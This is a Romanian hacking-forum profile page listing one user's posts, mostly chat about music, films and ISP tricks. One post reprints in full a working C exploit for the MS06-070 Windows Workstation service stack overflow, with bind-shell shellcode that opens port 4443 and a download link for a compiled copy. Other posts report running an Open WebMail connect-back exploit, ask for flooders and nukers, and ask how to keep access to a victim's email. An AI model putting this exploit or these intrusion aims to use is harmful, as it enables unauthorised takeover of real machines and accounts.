Christian
-
Posts
90 -
Joined
-
Last visited
Posts posted by Christian
-
-
dar ceva pt vypress nu aveti? nici asta nu are efect...nu am gasit prog de flood pt el
-
Marc et Claude - Tremble (vinil club mix)
& in coada de asteptare
Happy Fathers - Bounce
-
si eu am conexiune tot prin PPPoE (nu ierdeesh) cu 3 feluri de tarifare
1. Net non-stop = 10$
2. 12 ore/zi = 7$
3. 200 ore/luna = 7$
insa am inteles ca la a 3-a varianta exista o smecherie prin care poti sa te conectezi chiar daca ai terminat cele 200 ore ..stie cineva ceva??
-
flyppy wrote: man srry da putina gramatica nu tiar strica...
sincer nici tie nu ti-ar strica :@
probabil ca nu merge numai in LAN ..ip-ul caruia ii dai shutdown trebuie sa aiba portul 135 (sau 445 ..nu`s sigur) deschis..insa majoritatea providerilor blocheaza porturile astea si in cele mai multe cazuri n`o sa mearga
-
hai ca deja incepeti sa o dati in SF ... acum incep sa inteleg de ce sunt interzise unele filme copiilor sun 12 ani
oricum povestea cu virusul numit prostie e REALA !! cunosc cateva persoane infectate ..noroc ca nu e contagios
-
ce versiune de windows este afectata ? banuiesc ca win2k
am incercat peWinXp SP1 si SP2 si nu merge ..
-
beerlover0008 wrote: Da, a facut multe case dar el are drepturile de proprietate, cum nu ii convine ceva poate sa arunce acei oameni in strada...
nu cred ca ar face asta ..el se straduieste sa creasca in ochii romanilor ..iti dai seama cum l-ar privi romanii daca i-ar da afara din case
beerlover0008 wrote: A mai cumparat si el un partid, l-am vazut intr-un filmulet facut inainte de 1989 cum el se destra cu tovarasii generali.da` ce ... tu nu te distrezi ?
beerlover0008 wrote: Parerea mea ca el se crede mai degraba un profet, foloseste religia doar sa para el mare om.parerea ta!
beerlover0008 wrote: Eu nu vad rostul exorcizarii unui stadion inainte de meci si multe porcarii ce mai face el.stie el ce stie..uite ca l-a ajutat dumnezeu si azi ..a facut egal cu pandurii :@ mare noroc
beerlover0008 wrote: Ma intreb cum si-a facut el averea, oare oile lui aveau lana de aur?
cu siguranta nu au lana de aur dar are el rotitzele din cap bine unse
concluzia ... JIJI RULZZZZZZZ !!! :@
-
/***************************************************************************
Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:[url]http://ruder.cdut.net/default.asp[/url]
Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct jmp EBX address and fixed exploit output status.
Should work on Windows 2000 Server SP4 (All Languages)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
[url]http://research.eeye.com/html/advisories/published/AD20061114.html[/url],
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
#pragma comment(lib, "wsock32.lib")
unsigned char SmbNeg[] =
"x00x00x00x2fxffx53x4dx42x72x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54"
"x20x4cx4dx20x30x2ex31x32x00";
unsigned char Session_Setup_AndX_Request[]=
"x00x00x00x48xffx53x4dx42x73x00"
"x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff"
"xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00"
"x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d"
"x62x00";
unsigned char TreeConnect_AndX_Request[]=
"x00x00x00x58xffx53x4dx42x75x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
"x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
"x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
"x3fx00";
unsigned char NTCreate_AndX_Request[]=
"x00x00x00x64xffx53x4dx42xa2x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00"
"x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00"
"x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00"
"x77x00x6bx00x73x00x73x00x76x00x63x00x00x00";
unsigned char Rpc_Bind_Wkssvc[]=
"x00x00x00x92xffx53x4dx42x25x00"
"x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00"
"x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00"
"x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a"
"x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49"
"x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00"
"x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00"
"x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3"
"xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11"
"x9fxe8x08x00x2bx10x48x60x02x00x00x00";
unsigned char Rpc_NetrJoinDomain2_Header[]=
"x00x00x00xa8xffx53x4dx42x25x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00"
"x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54"
"x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00"
"x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00"
"x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00"
"x00x00x00x00"
"x16x00" //opnum,NetrJoinDomain2
"x30x2ax42x00"
"x0ex00x00x00"
"x00x00x00x00"
"x0ex00x00x00"
"x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00"
"x00x00"
"x10x01x00x00"
"x00x00x00x00"
"x10x01x00x00";
unsigned char Rpc_NetrJoinDomain2_End[]=
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x01x00x00x00";
unsigned char *lpDomainName=NULL;
DWORD dwDomainNameLen=0;
/* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */
unsigned char shellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9"
"x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31"
"x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45"
"xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57"
"x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6"
"x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25"
"xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
"xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e"
"x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e"
"x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc"
"xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d"
"xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f"
"x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6"
"x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
"xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99"
"x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e"
"xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3"
"x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31"
"x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f"
"x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e"
"x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
"xbaxa6xf5x31x39x59x23xce";
DWORD fill_len_1 =0x84c; //fill data
DWORD fill_len_2 =0x1000; //fill rubbish data
DWORD addr_jmp_ebx=0x77F92A9B; //jmp ebx address,in ntdll.dll
unsigned char code_jmp8[]= //jmp 8
"xEBx06x90x90";
unsigned char *Rpc_NetrJoinDomain2=NULL;
DWORD dwRpc_NetrJoinDomain2=0;
unsigned char recvbuff[2048];
void showinfo(void)
{
printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn");
printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n");
printf("page:http://ruder.cdut.net/default.aspnn");
printf("Code fixed by S A Stevens - 16.11.2006n");
printf("Should work on Windows 2000 Server SP4 (All Languages)nn");
printf("usage:n");
printf("ms06070 targetip DomainNamenn");
printf("notice:n");
printf("Make sure the DomainName is valid and live,more informations seen");
printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n");
printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn");
}
void neg ( int s )
{
char response[1024];
memset(response,0,sizeof(response));
send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}
void MakeAttackPacket(char *lpDomainNameStr)
{
DWORD j,len,b_flag;
dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
memset(lpDomainName,0,dwDomainNameLen);
MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
*(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
*(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
len=dwDomainNameLen+ //DomainName
fill_len_1-3*2+ //fill_len_1
4+ //jmp 8
4+ //addr jmp ebx
sizeof(shellcode)-1+ //shellcode
fill_len_2+ //fill_len_2
2; //0x0000
b_flag=0;
if (len%2==1)
{
len++;
b_flag=1;
}
dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
len+
sizeof(Rpc_NetrJoinDomain2_End)-1; //end
//malloc
Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
if (Rpc_NetrJoinDomain2==NULL)
{
printf("malloc error!n");
return;
}
//fill nop
memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
//update para1 length
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
//copy header
memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
//copy DomainName
memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
j=j+dwDomainNameLen;
//calculate offset
j=j+fill_len_1-3*2;
//jmp 8
memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
j=j+4;
//jmp ebx address
*(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
j=j+4;
//copy shellcode
memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
j=j+sizeof(shellcode)-1;
//fill data
memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
j=j+fill_len_2;
//0x0000(NULL)
if (b_flag==0)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
j=j+2;
}
else if (b_flag==1)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
Rpc_NetrJoinDomain2[j+2]=0x00;
j=j+3;
}
//copy other parameter
memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
}
void main(int argc,char **argv)
{
WSADATA ws;
struct sockaddr_in server;
SOCKET sock;
DWORD ret;
WORD userid,treeid,fid;
WSAStartup(MAKEWORD(2,2),&ws);
sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0)
{
return;
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons((USHORT)445);
printf("[+] Connecting %sn",argv[1]);
ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf("Connection Error, Port 445 Firewalled?n");
return;
}
neg(sock);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf("send Session_Setup_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
userid=*(WORD *)(recvbuff+0x20); //get userid
memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf("send TreeConnect_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
treeid=*(WORD *)(recvbuff+0x1c); //get treeid
//send NTCreate_AndX_Request
memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid
memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid
ret=send(sock,(char
*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
if (ret<=0)
{
printf("send NTCreate_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
fid=*(WORD *)(recvbuff+0x2a); //get fid
//rpc bind
memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
*(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
if (ret<=0)
{
printf("send Rpc_Bind_Wkssvc error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
MakeAttackPacket((char *)argv[2]);
memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
*(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
*(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count
*(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length
ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
if (ret<=0)
{
printf("send Rpc_NetrJoinDomain2 error!n");
return;
}
printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
closesocket(sock);
}
// milw0rm.com [2006-11-17]and the compiled version:
http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar
-
imi cer scuze ..versiunea anterioara am pierdut-o cu sursa cu tot dupa o formatare neprogramata
iar versiunea asta am facut-o ulterior, in graba si probabil am gresit ceva .. o sa-mi fac timp zilele astea pt a repara eventualele greseli :@ -
Shocker wrote:Christian wrote: ar mai fi o a 3-a varianta si anume ascunderea cu ajutorul comenzii attrib
ex: dai in CMD comanda "attrib +H +S FolderName"
astfel folderul o sa fie complet invizibil
Nu e complet inizibil.
Prin comanda attrib +H +S il faci Hidden si System, insa daca dai de la Folder Options > Show hidden files and folders si debifeziHide protected operating system files o sa il vezi
yep` ...u`r right dar sa fim seriosi ..cati crezi ca stiu de optiunea aia ?eu unu` nu stiam
-
ar mai fi o a 3-a varianta si anume ascunderea cu ajutorul comenzii attrib
ex: dai in CMD comanda "attrib +H +S FolderName"
astfel folderul o sa fie complet invizibil
-
-
Chiar aveam nevoie de un exploit pt Open WebMail ... l-am testat pe Open WebMail version 1.81 si rezultatul este:
[+] Listen on port: 4444
[+] Prepairing ShellCode...Done!
[+] Inject Shellcode to out host...Done!
[+] Chmod our ShellCode on host...Done!
[+] Exec ShellCode...Done!
[+] Wait for Connect-back
Can't Hack
User defined signal 2
any ideas ? :?
-
10x ppl ! majoritatea filmelor pe care le-ati mentionat nu le-am vazut asa ca am de downloadat nu gluma ..noroc cu provideru ca mi-a marit din nou viteza de download
btw daca mai stie cineva nume de filme peste care merita sa tragi un ochi cred ca nu s-ar supara nimeni daca le-ati posta aici
-
recuento wrote:Christian wrote: :@ :@
r u crazy dude?
la 2 mb care ocupa ce stie sa faca? downloadeaza tot internetu ?
daca era detectabil 150% si vindeai pe datorie sa mor de nu`l cumparam eu
daca serv ocupa 2 mb ...edit serv`ul cat ocupa? nu de alta dar sunt in criza de spatiu zilele astea :@
Smart noob in caz ca nu ti-ai dat seama e 150% gluma probabil facuta din insistentele unora de a-l convinge sa le faca nu stiu ce.
n00b ce ma faceam eu fara tine? probabil imi era mai bine
mi-am dat seama ca era gluma si am replicat cu o alta gluma, n00b
-
ce filme ati mai vazut in ultimul timp si v-au lasat o impresie placuta?
poate sa ma indrume cineva spre 1-2 filme bune?(mai noi daca se poate) pt ca sincer m-am saturat sa vad filme de tot kktu`(si cand zic tot kktu` ma refer la TOT KKTU` !!!)nu vreau sa mai pierd timpul aiurea cu astfel de filme so ..give me some names !?!
-
la multi ani SpiridusuCaddy !!
sa ai bani si bogatzii ...da` sa-mi zici unde le tzii
-
10x virusz ptr programe
eu unul ma impac bine cu rapidshare ...iau cu viteza maxima de pe ele (62 kB/s) pe cand de pe urban iau cu maxim 30 kB/s
singurul dezavantaj este ca pe rapidshare fisierele expira destul de rpd
apropo de VC++ ..in caz ca-l ia cineva..
nu o sa mearga instalat doar ruland Setup.exe ..pt a-l instala urmati pasii:
1.faci o copie a fisierului din setup/VS98ENT.STF si o redenumesti in acmsetup.STF
2.copiaza tot ce contine folderul /setup/ in folderul precedent (cel care contine ACMBOOT.EXE)
*.nu uita sa pui si acmsetup.STF in folderul care contine ACMBOOT.EXE
3.instaleaza ruland fisierul acmsetup.exe sau Setup.exe
4.Enjoy it!
celelalte programe nu le-am testat si nu stiu daca fac probleme la instalare
-
Scarto poate sa scrie si in chineza ...odata ce e TUTORIAL VIDEO ar trebui sa intelegi
nice post YceFire
-
-
Jobasan2 wrote: Shakira porn movie!
asta vinde gradinarului castravetzi :@
Scarto wrote:Jobasan2 wrote: Shakira porn movie!Ce lake ! =) E o arhiva .exe (cel mai probabil bots)
mai exact un trojan downloader
-
eddie47 esti sigur ca ai incercat si "neptune" ?
btw Urans e a 7-a planeta de la soare
-
BizZaroO wrote: bai fratilor!!!! care e parola la al doilea joc? nu tre ca lvl 1
function Try(passwd) {
if (passwd =="h4x0r") {
alert("Alright! On to level 2...");
location.href = "level2-xfdgnh.xhtml";
}
else {
alert("The password is incorrect. Please don't try again.");
location.href = "http://www.disney.com/";
}asta o poti gasi in sursa paginii
dar ce farec mai are jocul daca iti spune altcineva raspunsurile?
incearca sa le descoperi singur
-
mi se pare mai sigura metoda asta fata de cea cu cookie browser
exista vre-o modalitate prin care sa am acces mai mult de 24 h la mail-ul victimei ?
Counter Strike flood (si nu numai) - FUNCTIONEAZA
in Programe hacking
Posted
asta stiam deja...dar nu gasesc nici un nuker care sa aiba vre-un efect asupra lui..hai ca deja incepem sa devenim offtopic.